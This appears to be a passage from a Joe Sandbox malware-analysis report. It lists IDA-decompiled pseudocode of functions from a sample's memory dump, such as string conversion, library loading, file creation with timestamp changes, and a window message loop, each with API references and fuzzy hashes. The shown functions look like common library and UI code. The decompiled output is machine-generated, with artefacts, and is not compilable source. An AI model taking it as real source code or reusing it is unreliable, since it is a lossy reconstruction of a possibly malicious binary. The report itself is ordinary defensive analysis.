					_a32 = _t98;
				}
				_t54 = MultiByteToWideChar(_t98, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t103, 0, 0);
				_v12 = _t54;
				if(_t54 == 0) {
					L38:
					_pop(_t99);
					_pop(_t104);
					_pop(_t81);
					return E00A4FBBC(_t54, _t81, _v8 ^ _t106, _t96, _t99, _t104);
				} else {
					_t96 = _t54 + _t54;
					_t86 = _t96 + 8;
					asm("sbb eax, eax");
					if((_t96 + 0x00000008 & _t54) == 0) {
						_t82 = 0;
						__eflags = 0;
						L14:
						if(_t82 == 0) {
							L36:
							_t105 = 0;
							L37:
							E00A5ABC3(_t82);
							_t54 = _t105;
							goto L38;
						}
						_t57 = MultiByteToWideChar(_t98, 1, _a16, _t103, _t82, _v12);
						_t121 = _t57;
						if(_t57 == 0) {
							goto L36;
						}
						_t100 = _v12;
						_t59 = E00A5AF6C(_t82, _t86, _v12, _t121, _a8, _a12, _t82, _v12, 0, 0, 0, 0, 0); // executed
						_t105 = _t59;
						if(_t105 == 0) {
							goto L36;
						}
						if((_a12 & 0x00000400) == 0) {
							_t96 = _t105 + _t105;
							_t88 = _t96 + 8;
							__eflags = _t96 - _t88;
							asm("sbb eax, eax");
							__eflags = _t88 & _t59;
							if((_t88 & _t59) == 0) {
								_t101 = 0;
								__eflags = 0;
								L30:
								__eflags = _t101;
								if(__eflags == 0) {
									L35:
									E00A5ABC3(_t101);
									goto L36;
								}
								_t61 = E00A5AF6C(_t82, _t88, _t101, __eflags, _a8, _a12, _t82, _v12, _t101, _t105, 0, 0, 0);
								__eflags = _t61;
								if(_t61 == 0) {
									goto L35;
								}
								_push(0);
								_push(0);
								__eflags = _a28;
								if(_a28 != 0) {
									_push(_a28);
									_push(_a24);
								} else {
									_push(0);
									_push(0);
								}
								_t105 = WideCharToMultiByte(_a32, 0, _t101, _t105, ??, ??, ??, ??);
								__eflags = _t105;
								if(_t105 != 0) {
									E00A5ABC3(_t101);
									goto L37;
								} else {
									goto L35;
								}
							}
							_t91 = _t96 + 8;
							__eflags = _t96 - _t91;
							asm("sbb eax, eax");
							_t65 = _t59 & _t91;
							_t88 = _t96 + 8;
							__eflags = _t65 - 0x400;
							if(_t65 > 0x400) {
								__eflags = _t96 - _t88;
								asm("sbb eax, eax");
								_t101 = E00A58E06(_t88, _t65 & _t88);
								_pop(_t88);
								__eflags = _t101;
								if(_t101 == 0) {
									goto L35;
								}
								 *_t101 = 0xdddd;
								L28:
								_t101 =  &(_t101[4]);
								goto L30;
							}
							__eflags = _t96 - _t88;
							asm("sbb eax, eax");
							E00A62010(_t65 & _t88);
							_t101 = _t107;
							__eflags = _t101;
							if(_t101 == 0) {
								goto L35;
							}
							 *_t101 = 0xcccc;
							goto L28;
						}
						_t70 = _a28;
						if(_t70 == 0) {
							goto L37;
						}
						_t125 = _t105 - _t70;
						if(_t105 > _t70) {
							goto L36;
						}
						_t105 = E00A5AF6C(_t82, 0, _t100, _t125, _a8, _a12, _t82, _t100, _a24, _t70, 0, 0, 0);
						if(_t105 != 0) {
							goto L37;
						}
						goto L36;
					}
					asm("sbb eax, eax");
					_t72 = _t54 & _t96 + 0x00000008;
					_t86 = _t96 + 8;
					if((_t54 & _t96 + 0x00000008) > 0x400) {
						__eflags = _t96 - _t86;
						asm("sbb eax, eax");
						_t82 = E00A58E06(_t86, _t72 & _t86);
						_pop(_t86);
						__eflags = _t82;
						if(__eflags == 0) {
							goto L36;
						}
						 *_t82 = 0xdddd;
						L12:
						_t82 =  &(_t82[4]);
						goto L14;
					}
					asm("sbb eax, eax");
					E00A62010(_t72 & _t86);
					_t82 = _t107;
					if(_t82 == 0) {
						goto L36;
					}
					 *_t82 = 0xcccc;
					goto L12;
				}
			}

0x00a5a960
0x00a5a961
0x00a5a962
0x00a5a969
0x00a5a96e
0x00a5a974
0x00a5a97a
0x00a5a980
0x00a5a983
0x00a5a983
0x00a5a986
0x00a5a988
0x00a5a988
0x00a5a986
0x00a5a98a
0x00a5a98f
0x00a5a996
0x00a5a999
0x00a5a999
0x00a5a9b5
0x00a5a9bb
0x00a5a9c0
0x00a5ab53
0x00a5ab56
0x00a5ab57
0x00a5ab58
0x00a5ab66
0x00a5a9c6
0x00a5a9c6
0x00a5a9c9
0x00a5a9ce
0x00a5a9d2
0x00a5aa26
0x00a5aa26
0x00a5aa28
0x00a5aa2a
0x00a5ab48
0x00a5ab48
0x00a5ab4a
0x00a5ab4b
0x00a5ab51
0x00000000
0x00a5ab51
0x00a5aa3b
0x00a5aa41
0x00a5aa43
0x00000000
0x00000000
0x00a5aa49
0x00a5aa5b
0x00a5aa60
0x00a5aa64
0x00000000
0x00000000
0x00a5aa71
0x00a5aaab
0x00a5aaae
0x00a5aab1
0x00a5aab3
0x00a5aab5
0x00a5aab7
0x00a5ab03
0x00a5ab03
0x00a5ab05
0x00a5ab05
0x00a5ab07
0x00a5ab41
0x00a5ab42
0x00000000
0x00a5ab47
0x00a5ab1b
0x00a5ab20
0x00a5ab22
0x00000000
0x00000000
0x00a5ab26
0x00a5ab27
0x00a5ab28
0x00a5ab2b
0x00a5ab67
0x00a5ab6a
0x00a5ab2d
0x00a5ab2d
0x00a5ab2e
0x00a5ab2e
0x00a5ab3b
0x00a5ab3d
0x00a5ab3f
0x00a5ab70
0x00000000
0x00000000
0x00000000
0x00000000
0x00a5ab3f
0x00a5aab9
0x00a5aabc
0x00a5aabe
0x00a5aac0
0x00a5aac2
0x00a5aac5
0x00a5aaca
0x00a5aae5
0x00a5aae7
0x00a5aaf1
0x00a5aaf3
0x00a5aaf4
0x00a5aaf6
0x00000000
0x00000000
0x00a5aaf8
0x00a5aafe
0x00a5aafe
0x00000000
0x00a5aafe
0x00a5aacc
0x00a5aace
0x00a5aad2
0x00a5aad7
0x00a5aad9
0x00a5aadb
0x00000000
0x00000000
0x00a5aadd
0x00000000
0x00a5aadd
0x00a5aa73
0x00a5aa78
0x00000000
0x00000000
0x00a5aa7e
0x00a5aa80
0x00000000
0x00000000
0x00a5aa9c
0x00a5aaa0
0x00000000
0x00000000
0x00000000
0x00a5aaa6
0x00a5a9d9
0x00a5a9db
0x00a5a9dd
0x00a5a9e5
0x00a5aa04
0x00a5aa06
0x00a5aa10
0x00a5aa12
0x00a5aa13
0x00a5aa15
0x00000000
0x00000000
0x00a5aa1b
0x00a5aa21
0x00a5aa21
0x00000000
0x00a5aa21
0x00a5a9e9
0x00a5a9ed
0x00a5a9f2
0x00a5a9f6
0x00000000
0x00000000
0x00a5a9fc
0x00000000
0x00a5a9fc

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00A557FB,00A557FB,?,?,?,00A5ABAC,00000001,00000001,2DE85006), ref: 00A5A9B5
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00A5ABAC,00000001,00000001,2DE85006,?,?,?), ref: 00A5AA3B
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,2DE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00A5AB35
__freea.LIBCMT ref: 00A5AB42

Part of subcall function 00A58E06: RtlAllocateHeap.NTDLL(00000000,?,?,?,00A54286,?,0000015D,?,?,?,?,00A55762,000000FF,00000000,?,?), ref: 00A58E38

__freea.LIBCMT ref: 00A5AB4B
__freea.LIBCMT ref: 00A5AB70

Memory Dump Source

Source File: 00000000.00000002.259400742.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.259371381.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259791588.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260050051.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a30000_file.jbxd

Similarity

API ID: ByteCharMultiWide__freea$AllocateHeap
String ID:
API String ID: 1414292761-0
Opcode ID: c36ef638a5edc7decae11ab9dfe7379ad45bb49f45228a59dd4d7838767bbff1
Instruction ID: 07466a1a4b0e35811d6fb1f219028238b8ab1e9ad1461a75c502aab599cc9330
Opcode Fuzzy Hash: c36ef638a5edc7decae11ab9dfe7379ad45bb49f45228a59dd4d7838767bbff1
Instruction Fuzzy Hash: 1451D072B00216AFDB258F64CD41EABBBABFB64751F164728FD04D6140EB34DC58C692

Uniqueness

Uniqueness Score: -1.00%

Function 00A53B72 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 63
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00A53B72(void* __ecx, signed int* _a4, intOrPtr _a8) {
				WCHAR* _v8;
				signed int _t11;
				WCHAR* _t12;
				struct HINSTANCE__* _t13;
				struct HINSTANCE__* _t16;
				struct HINSTANCE__* _t18;
				signed int* _t22;
				signed int* _t26;
				struct HINSTANCE__* _t29;
				WCHAR* _t31;
				void* _t32;

				_t26 = _a4;
				while(_t26 != _a8) {
					_t11 =  *_t26;
					_t22 = 0xa920e0 + _t11 * 4;
					_t29 =  *_t22;
					if(_t29 == 0) {
						_t12 =  *(0xa662b4 + _t11 * 4);
						_v8 = _t12;
						_t13 = LoadLibraryExW(_t12, 0, 0x800); // executed
						_t29 = _t13;
						if(_t29 != 0) {
							L13:
							 *_t22 = _t29;
							if( *_t22 != 0) {
								FreeLibrary(_t29);
							}
							L15:
							_t16 = _t29;
							L12:
							return _t16;
						}
						_t18 = GetLastError();
						if(_t18 != 0x57) {
							L8:
							 *_t22 = _t18 | 0xffffffff;
							L9:
							_t26 =  &(_t26[1]);
							continue;
						}
						_t31 = _v8;
						_t18 = E00A56088(_t31, L"api-ms-", 7);
						_t32 = _t32 + 0xc;
						if(_t18 == 0) {
							goto L8;
						}
						_t18 = LoadLibraryExW(_t31, 0, 0);
						_t29 = _t18;
						if(_t29 != 0) {
							goto L13;
						}
						goto L8;
					}
					if(_t29 != 0xffffffff) {
						goto L15;
					}
					goto L9;
				}
				_t16 = 0;
				goto L12;
			}

0x00a53b79
0x00a53bee
0x00a53b7e
0x00a53b80
0x00a53b87
0x00a53b8c
0x00a53b95
0x00a53ba4
0x00a53ba7
0x00a53bad
0x00a53bb1
0x00a53bfa
0x00a53bfc
0x00a53c00
0x00a53c03
0x00a53c03
0x00a53c09
0x00a53c09
0x00a53bf5
0x00a53bf9
0x00a53bf9
0x00a53bb3
0x00a53bbc
0x00a53be6
0x00a53be9
0x00a53beb
0x00a53beb
0x00000000
0x00a53beb
0x00a53bbe
0x00a53bc9
0x00a53bce
0x00a53bd3
0x00000000
0x00000000
0x00a53bda
0x00a53be0
0x00a53be4
0x00000000
0x00000000
0x00000000
0x00a53be4
0x00a53b91
0x00000000
0x00000000
0x00000000
0x00a53b93
0x00a53bf3
0x00000000

APIs

FreeLibrary.KERNEL32(00000000,?,?,00A53C35,00000000,00000FA0,00A92088,00000000,?,00A53D60,00000004,InitializeCriticalSectionEx,00A66394,InitializeCriticalSectionEx,00000000), ref: 00A53C03

Strings

api-ms-, xrefs: 00A53BC3

Memory Dump Source

Source File: 00000000.00000002.259400742.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.259371381.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259791588.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260050051.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a30000_file.jbxd

Similarity

API ID: FreeLibrary
String ID: api-ms-
API String ID: 3664257935-2084034818
Opcode ID: 8514cc8994bc8a71533cd51a3dd0143f99b510543695aabd911a4a213b39e1ba
Instruction ID: 13a2c89a1a99ad02a361320ebd19ecbd2d2b816c7345e9f4c6dae38049ad1494
Opcode Fuzzy Hash: 8514cc8994bc8a71533cd51a3dd0143f99b510543695aabd911a4a213b39e1ba
Instruction Fuzzy Hash: 3611A333A45221ABCF228BA89C41B5D3774BF417B2F260211ED15FB290E771EF0986D1

Uniqueness

Uniqueness Score: -1.00%

Function 00A398E0 Relevance: 7.6, APIs: 5, Instructions: 111
filetimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 97%

			E00A398E0(void* __ecx, void* __esi, signed int _a4, short _a8, WCHAR* _a4180, unsigned int _a4184) {
				struct _FILETIME _v0;
				char _t38;
				void* _t40;
				long _t52;
				unsigned int _t53;
				long _t56;
				signed int _t57;
				void* _t61;
				void* _t62;
				long _t68;
				void* _t70;

				_t62 = __esi;
				E00A4EC50(0x1050);
				_t53 = _a4184;
				_t61 = __ecx;
				 *(__ecx + 0x1034) =  *(__ecx + 0x1034) & 0x00000000;
				if( *((char*)(__ecx + 0x30)) != 0 || (_t53 & 0x00000004) != 0) {
					_t38 = 1;
				} else {
					_t38 = 0;
				}
				_push(_t62);
				_t68 = ( !(_t53 >> 1) & 0x00000001) + 1 << 0x1e;
				if((_t53 & 0x00000001) != 0) {
					_t68 = _t68 | 0x40000000;
				}
				_t56 =  !(_t53 >> 3) & 0x00000001;
				if(_t38 != 0) {
					_t56 = _t56 | 0x00000002;
				}
				E00A36EDB( &_a8);
				if( *((char*)(_t61 + 0x24)) != 0) {
					_t68 = _t68 | 0x00000100;
				}
				_t40 = CreateFileW(_a4180, _t68, _t56, 0, 3, 0x8000000, 0); // executed
				_t70 = _t40;
				if(_t70 != 0xffffffff) {
					goto L15;
				} else {
					_v0.dwLowDateTime = GetLastError();
					if(E00A3BB03(_a4180,  &_a8, 0x800) == 0) {
						L16:
						if(_v0.dwLowDateTime == 2) {
							 *((intOrPtr*)(_t61 + 0x1034)) = 1;
						}
						L18:
						if( *((char*)(_t61 + 0x24)) != 0 && _t70 != 0xffffffff) {
							_v0.dwLowDateTime = _v0.dwLowDateTime | 0xffffffff;
							_a4 = _a4 | 0xffffffff;
							SetFileTime(_t70, 0,  &_v0, 0);
						}
						 *((char*)(_t61 + 0x1c)) = 0;
						 *((intOrPtr*)(_t61 + 0x10)) = 0;
						_t30 = _t70 != 0xffffffff;
						_t57 = _t56 & 0xffffff00 | _t30;
						 *((char*)(_t61 + 0x15)) = 0;
						if(_t30 != 0) {
							 *(_t61 + 8) = _t70;
							E00A40602(_t61 + 0x32, _a4180, 0x800);
							 *((char*)(_t61 + 0x25)) = 0;
						}
						return _t57;
					}
					_t70 = CreateFileW( &_a8, _t68, _t56, 0, 3, 0x8000000, 0);
					_t52 = GetLastError();
					if(_t52 == 2) {
						_v0.dwLowDateTime = _t52;
					}
					L15:
					if(_t70 != 0xffffffff) {
						goto L18;
					}
					goto L16;
				}
			}

0x00a398e0
0x00a398e5
0x00a398eb
0x00a398f4
0x00a398f6
0x00a39901
0x00a3990c
0x00a39908
0x00a39908
0x00a39908
0x00a3990e
0x00a39919
0x00a3991f
0x00a39921
0x00a39921
0x00a3992c
0x00a39931
0x00a39933
0x00a39933
0x00a3993a
0x00a39943
0x00a39945
0x00a39945
0x00a3995f
0x00a39965
0x00a3996a
0x00000000
0x00a3996c
0x00a39972
0x00a3998e
0x00a399c8
0x00a399cd
0x00a399cf
0x00a399cf
0x00a399d9
0x00a399de
0x00a399e5
0x00a399ee
0x00a399f9
0x00a399f9
0x00a39a04
0x00a39a07
0x00a39a0a
0x00a39a0a
0x00a39a0d
0x00a39a10
0x00a39a21
0x00a39a25
0x00a39a2a
0x00a39a2a
0x00a39a39
0x00a39a39
0x00a399a8
0x00a399aa
0x00a399b3
0x00a399b5
0x00a399b5
0x00a399c3
0x00a399c6
0x00000000
0x00000000
0x00000000
0x00a399c6

APIs

CreateFileW.KERNELBASE(?,?,?,00000000,00000003,08000000,00000000,?,00000000,?,?,00A37760,?,00000005,?,00000011), ref: 00A3995F
GetLastError.KERNEL32(?,?,00A37760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00A3996C
CreateFileW.KERNEL32(00000000,?,?,00000000,00000003,08000000,00000000,?,?,00000800,?,?,00A37760,?,00000005,?), ref: 00A399A2
GetLastError.KERNEL32(?,?,00A37760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00A399AA
SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,00A37760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00A399F9

Memory Dump Source

Source File: 00000000.00000002.259400742.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.259371381.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259791588.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260050051.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a30000_file.jbxd

Similarity

API ID: File$CreateErrorLast$Time
String ID:
API String ID: 1999340476-0
Opcode ID: bc843632492c8f3a372cfd0fc61bc78f7a05a34b0194aaf8af74783a4342e0c4
Instruction ID: efde60fd508078525e9f83e450c6d361f917ce0d806548573851a803d46d2cf6
Opcode Fuzzy Hash: bc843632492c8f3a372cfd0fc61bc78f7a05a34b0194aaf8af74783a4342e0c4
Instruction Fuzzy Hash: 183122315443456FE730DF64CD86BDBBBA8BB44320F200B19F9A1962E0D7F4A949CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00A59869 Relevance: 7.6, APIs: 5, Instructions: 53
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 83%

			E00A59869(void* __ecx, void* __edx) {
				void* __ebx;
				void* __edi;
				intOrPtr _t2;
				void* _t3;
				void* _t4;
				void* _t10;
				void* _t11;
				void* _t13;
				void* _t16;
				void* _t17;
				long _t18;

				_t11 = __ecx;
				_t18 = GetLastError();
				_t10 = 0;
				_t2 =  *0xa6e7fc; // 0x6
				_t21 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L2:
					_t3 = E00A5B136(_t11, 1, 0x364); // executed
					_t17 = _t3;
					_pop(_t13);
					if(_t17 != 0) {
						_t4 = E00A5AEB1(_t10, _t13, _t17, __eflags,  *0xa6e7fc, _t17);
						__eflags = _t4;
						if(_t4 != 0) {
							E00A59649(_t13, _t17, 0xa92288);
							E00A58DCC(_t10);
							__eflags = _t17;
							if(_t17 != 0) {
								goto L9;
							} else {
								goto L8;
							}
						} else {
							_push(_t17);
							goto L4;
						}
					} else {
						_push(_t10);
						L4:
						E00A58DCC();
						L8:
						SetLastError(_t18);
					}
				} else {
					_t17 = E00A5AE5B(0, _t11, _t16, _t21, _t2);
					if(_t17 != 0) {
						L9:
						SetLastError(_t18);
						_t10 = _t17;
					} else {
						goto L2;
					}
				}
				return _t10;
			}

0x00a59869
0x00a59874
0x00a59876
0x00a59878
0x00a5987d
0x00a59880
0x00a5988e
0x00a59895
0x00a5989a
0x00a5989d
0x00a598a0
0x00a598b2
0x00a598b7
0x00a598b9
0x00a598c4
0x00a598ca
0x00a598d2
0x00a598d4
0x00000000
0x00000000
0x00000000
0x00000000
0x00a598bb
0x00a598bb
0x00000000
0x00a598bb
0x00a598a2
0x00a598a2
0x00a598a3
0x00a598a3
0x00a598d6
0x00a598d7
0x00a598d7
0x00a59882
0x00a59888
0x00a5988c
0x00a598df
0x00a598e0
0x00a598e6
0x00000000
0x00000000
0x00000000
0x00a5988c
0x00a598ed

APIs

GetLastError.KERNEL32(?,?,?,00A591AD,00A5B188,?,00A59813,00000001,00000364,?,00A540EF,?,?,00A71098), ref: 00A5986E
_free.LIBCMT ref: 00A598A3
_free.LIBCMT ref: 00A598CA
SetLastError.KERNEL32(00000000,?,00A71098), ref: 00A598D7
SetLastError.KERNEL32(00000000,?,00A71098), ref: 00A598E0

Memory Dump Source

Source File: 00000000.00000002.259400742.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.259371381.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259791588.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260050051.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a30000_file.jbxd

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 6719508b49a7f0d6bf8224d88f03d12a7edd7f2ece54480ae7eec97541a5f789
Instruction ID: b0eb2aaf1d08bb3177f89006573c5f1830d2302f256b22f851c1922019bb4a2b
Opcode Fuzzy Hash: 6719508b49a7f0d6bf8224d88f03d12a7edd7f2ece54480ae7eec97541a5f789
Instruction Fuzzy Hash: C101F437244701FBC612A7A46D8595B25BAFFE37737210134FD19AA192EF748C0F5261

Uniqueness

Uniqueness Score: -1.00%

Function 00A4B568 Relevance: 7.5, APIs: 5, Instructions: 38
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00A4B568() {
				struct tagMSG _v32;
				int _t7;
				struct HWND__* _t10;
				long _t14;

				_t7 = PeekMessageW( &_v32, 0, 0, 0, 0); // executed
				if(_t7 != 0) {
					GetMessageW( &_v32, 0, 0, 0);
					_t10 =  *0xa78458; // 0x1041e
					if(_t10 == 0) {
						L3:
						TranslateMessage( &_v32);
						_t14 = DispatchMessageW( &_v32); // executed
						return _t14;
					}
					_t7 = IsDialogMessageW(_t10,  &_v32);
					if(_t7 == 0) {
						goto L3;
					}
				}
				return _t7;
			}

0x00a4b579
0x00a4b581
0x00a4b58a
0x00a4b590
0x00a4b597
0x00a4b5a8
0x00a4b5ac
0x00a4b5b6
0x00000000
0x00a4b5b6
0x00a4b59e
0x00a4b5a6
0x00000000
0x00000000
0x00a4b5a6
0x00a4b5be

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00A4B579
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00A4B58A
IsDialogMessageW.USER32(0001041E,?), ref: 00A4B59E
TranslateMessage.USER32(?), ref: 00A4B5AC
DispatchMessageW.USER32(?), ref: 00A4B5B6

Memory Dump Source

Source File: 00000000.00000002.259400742.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.259371381.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259791588.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260050051.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a30000_file.jbxd

Similarity

API ID: Message$DialogDispatchPeekTranslate
String ID:
API String ID: 1266772231-0
Opcode ID: 38f175cc7b719cffdb6ebde4d083de0859c86ffa4e5a4b98070f5e8c2811afed
Instruction ID: 89987c01f8b07e7f1bec8eade7e6713feb7deb93c7f2734f4f67863230272438
Opcode Fuzzy Hash: 38f175cc7b719cffdb6ebde4d083de0859c86ffa4e5a4b98070f5e8c2811afed
Instruction Fuzzy Hash: DCF0BD76A0121AAB8F20DBE69C4DDDBBFBCEE452917004415B51AD2010EF74D606CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 00A4ABAB Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00A4ABAB(long _a4) {
				short _v164;
				long _t5;
				long _t6;
				WCHAR* _t9;
				long _t11;

				_t11 = _a4;
				_t5 = GetClassNameW(_t11,  &_v164, 0x50);
				if(_t5 != 0) {
					_t9 = L"EDIT";
					_t5 = E00A41FBB( &_v164, _t9);
					if(_t5 != 0) {
						_t5 = FindWindowExW(_t11, 0, _t9, 0); // executed
						_t11 = _t5;
					}
				}
				if(_t11 != 0) {
					_t6 = SHAutoComplete(_t11, 0x10); // executed
					return _t6;
				}
				return _t5;
			}

0x00a4abbb
0x00a4abc2
0x00a4abca
0x00a4abcd
0x00a4abda
0x00a4abe1
0x00a4abe9
0x00a4abef
0x00a4abef
0x00a4abf1
0x00a4abf4
0x00a4abf9
0x00000000
0x00a4abf9
0x00a4ac01

APIs

GetClassNameW.USER32(?,?,00000050), ref: 00A4ABC2
SHAutoComplete.SHLWAPI(?,00000010), ref: 00A4ABF9

Part of subcall function 00A41FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,00A3C116,00000000,.exe,?,?,00000800,?,?,?,00A48E3C), ref: 00A41FD1

FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 00A4ABE9

Strings

EDIT, xrefs: 00A4ABCD, 00A4ABD8, 00A4ABE5

Memory Dump Source

Source File: 00000000.00000002.259400742.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.259371381.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259791588.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260050051.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a30000_file.jbxd

Similarity

API ID: AutoClassCompareCompleteFindNameStringWindow
String ID: EDIT
API String ID: 4243998846-3080729518
Opcode ID: 90118d8a9ac342920da3e208a991dd38a74271ae94af1ea7bb2882b2986b14bd
Instruction ID: 4f0acaf3bcfd5f6492e133c1bd71dba4fd85f5b34bb46f7df20b1932de1981ee
Opcode Fuzzy Hash: 90118d8a9ac342920da3e208a991dd38a74271ae94af1ea7bb2882b2986b14bd
Instruction Fuzzy Hash: F8F0823674122876DB309764AC0AF9B767C9F86B40F484012BA05E61C0DB60DE4785B6

Uniqueness

Uniqueness Score: -1.00%

Function 00A4AC16 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 34
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 25%

			E00A4AC16(intOrPtr* __ecx) {
				char _v8;
				intOrPtr _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				intOrPtr _t10;

				_t10 = E00A4081B(L"riched20.dll"); // executed
				 *__ecx = _t10;
				 *0xa93174(0); // executed
				_v16 = 8;
				_v12 = 0x7ff;
				 *0xa93034( &_v16);
				_v32 = 1;
				_v28 = 0;
				_v24 = 0;
				_v20 = 0;
				L00A4EB2C(); // executed
				 *0xa93090(0xa78438,  &_v8,  &_v32, 0); // executed
				return __ecx;
			}

0x00a4ac25
0x00a4ac2c
0x00a4ac2f
0x00a4ac38
0x00a4ac40
0x00a4ac47
0x00a4ac51
0x00a4ac5c
0x00a4ac60
0x00a4ac63
0x00a4ac66
0x00a4ac70
0x00a4ac7b

APIs

Part of subcall function 00A4081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00A40836
Part of subcall function 00A4081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00A3F2D8,Crypt32.dll,00000000,00A3F35C,?,?,00A3F33E,?,?,?), ref: 00A40858

OleInitialize.OLE32(00000000), ref: 00A4AC2F
GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00A4AC66
SHGetMalloc.SHELL32(00A78438), ref: 00A4AC70

Strings

riched20.dll, xrefs: 00A4AC1E

Memory Dump Source

Source File: 00000000.00000002.259400742.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.259371381.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
